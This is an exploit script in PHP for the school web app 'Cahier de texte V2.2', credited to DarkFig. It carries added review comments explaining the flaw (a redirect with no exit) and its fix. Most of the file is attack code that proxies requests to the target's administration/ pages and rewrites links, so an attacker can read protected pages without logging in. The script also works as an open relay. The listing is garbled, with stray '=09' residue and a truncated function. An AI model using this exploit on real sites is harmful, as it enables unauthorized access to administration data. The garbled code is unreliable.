
Cahier de texte V2.2 Bypass general access protection exploit






www.etab.ac-caen.fr/bsauveur/cahier_de_texte/ 
  Poc.link......: acid-root.new.fr/poc/17061224.txt
  Credits.......: DarkFig

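  Vulnerable code
  ==============
  [the beginning of the quoted fragment was lost when this page was extracted]
  ... 'Administrateur') { header("Location: ../index.php");}
  ;} else { header("Location: ../index.php");}?>
  ...

  Why this is a flaw: in the lines shown, both branches only send a Location
  header and nothing (exit/die) stops the script afterwards, so the rest of the
  administration page still runs and its output is still sent. A client that
  does not follow the redirect receives the protected page.
  Fix: end the request right after the redirect (header(...); exit;) and make
  the role check the first thing every administration page does.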

*/

// Entry point: relays one request to the target's administration/ directory
// and prints whatever comes back.
// NOTE(review): host, path, prox and wanted all come straight from the query
// string with no validation, so wherever this file is hosted it behaves as an
// open HTTP relay for anyone who can reach it.

// Without a non-empty "host" parameter only the banner is shown; headers() exits.
if (empty($_GET['host'])) {
    headers();
}

// Default page when none is requested. $wanted is assigned only in this
// branch; when the parameter is present, nothing in this block reads it
// from $_GET.
if (!isset($_GET['wanted'])) {
    $wanted = 'index.php';
}

// These three names must stay global: html_replace() reads them via `global`.
$host = $_GET['host'];
$prox = $_GET['prox'];
$path = $_GET['path'];

// The relayed response is printed as returned by sockxp(); no redirect sent by
// the target is followed.
$page = sockxp($host, $path, $prox, "administration/" . $wanted);
echo $page;
exit(0);

/**
 * Prints the script's banner page and terminates with exit(0).
 *
 * NOTE(review): the string passed to print() appears to have lost its HTML
 * markup when the page was extracted; only the title text is left.
 */
function headers()
{
	print("

 Cahier de texte V2.2 Exploit


 
"); exit(0); }

/**
 * Sends one HTTP/1.1 request for $wanted on $host and returns the response
 * after passing it through html_replace().
 *
 * The connection goes to $prox ("host:port") when it is non-empty, otherwise
 * to $host on port 80. The request method mirrors the method used to call
 * this script ($_SERVER['REQUEST_METHOD']); for POST the body comes from
 * get_postdata().
 *
 * Defender's view: the whole response (status line, headers and body) is read
 * to EOF and returned as-is, so a Location header from the target is never
 * acted on. A page that redirects without terminating therefore still has its
 * body displayed. On the server side this corresponds to requests under
 * administration/ carrying "Connection: Close" and an absolute-URI request
 * line, answered with a redirect status and a non-empty body.
 *
 * @param string $host   target host name, also used for the Host header
 * @param string $path   path prefix prepended to $wanted on non-POST requests
 * @param string $prox   optional "host:port" to connect to instead of $host:80
 * @param string $wanted page to request (the caller prefixes "administration/")
 * @return string        value returned by html_replace() for the raw response
 */
function sockxp($host,$path,$prox,$wanted) {
    // Connection endpoint: the proxy if one was given, else the target on port 80.
    $hope = !empty($prox) ? $prox : $host.':80';
    // Split "host:port" into $hosta[1] (host) and $hosta[2] (port).
    preg_match("/^(\S*):([0-9]+){1,5}/",$hope,$hosta);
    $hosh = $hosta[1];
    $hosp = $hosta[2];
    // NOTE(review): "=09" looks like quoted-printable residue for a tab
    // character left over from the page's source; it is not PHP and recurs
    // several times below.
    =09
    $recv = '';
    $meth = $_SERVER['REQUEST_METHOD'];
    // Give up (exit status 1) when host/port could not be parsed or the
    // connection fails.
    if(empty($hosh) || empty($hosp)) exit(1);
    if(!$sock = fsockopen($hosh,$hosp)) exit(1);
    // Request line uses an absolute URI ("METHOD http://host...").
    $dat = $meth." http://".$host;
    =09
    // POST: "/" plus $wanted with the "administration//" prefix removed;
    // any other method: $path followed by $wanted.
    if($meth === "POST") $dat .= "/".str_replace("administration//","",$wanted);
    else $dat .= $path.$wanted;
    =09
    $dat .= " HTTP/1.1\r\n";
    $dat .= "Host: $host\r\n";
    $dat .= "Connection: Close\r\n";
    =09
    if($meth === "POST") {
        // Form body is produced by get_postdata(); Content-Length is its byte length.
        $postdata = get_postdata();
        $dat .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $dat .= "Content-Length: ".strlen($postdata)."\r\n\r\n";
        $dat .= $postdata."\r\n\r\n";
    } else {
        // No body: a blank line ends the header section.
        $dat .= "\r\n";
    }
    fputs($sock,$dat);
    // Read the complete response, headers included, until the peer closes.
    while(!feof($sock)) $recv .= fgets($sock);
    fclose($sock);
    return html_replace($recv);
}

/**
 * Rewrites URLs in the relayed page so that form actions, links and
 * MM_goToURL() calls point back at this script.
 *
 * Reads the globals $host, $path and $prox to build $iniv, the prefix
 * "<this script>?host=...&path=...&prox=...&wanted=" that is inserted in
 * front of each rewritten URL.
 *
 * NOTE(review): the end of this function is missing from the page (see the
 * note at the for loop), so its return value cannot be documented from here.
 */
function html_replace($htmlc) {
    global $host,$path,$prox;
    $iniv = $_SERVER['PHP_SELF']."?host=$host&path=$path&prox=$prox&wanted=";
    // Form targets are routed through this script.
    $newc = str_replace("action=\"","action=\"$iniv",$htmlc);
    // Attribute values starting with ".." are made absolute against the target.
    $newc = str_replace("=\"..","=\"http://${host}${path}administration/..",$newc);
    // Anchors and MM_goToURL('parent', ...) calls are routed through this script.
    $newc = str_replace("a href=\"","a href=\"$iniv",$newc);
    $newc = str_replace("MM_goToURL('parent','","MM_goToURL('parent','$iniv",$newc);
    $newc = explode("\n",$newc);
    // NOTE(review): the text is truncated here. Everything between "$i" and
    // "$value)" was lost in extraction: the loop condition and body, the rest
    // of html_replace(), and the start of the function that builds $postdata
    // (presumably get_postdata(), which sockxp() calls; confirm against an
    // intact copy). What follows is the tail of that later function, joining
    // "key=value&" pairs. The listing is not runnable as shown.
    for($i=0;$i $value) {
        $postdata .= $key."=".$value."&";
    }
    return $postdata;
}
?>
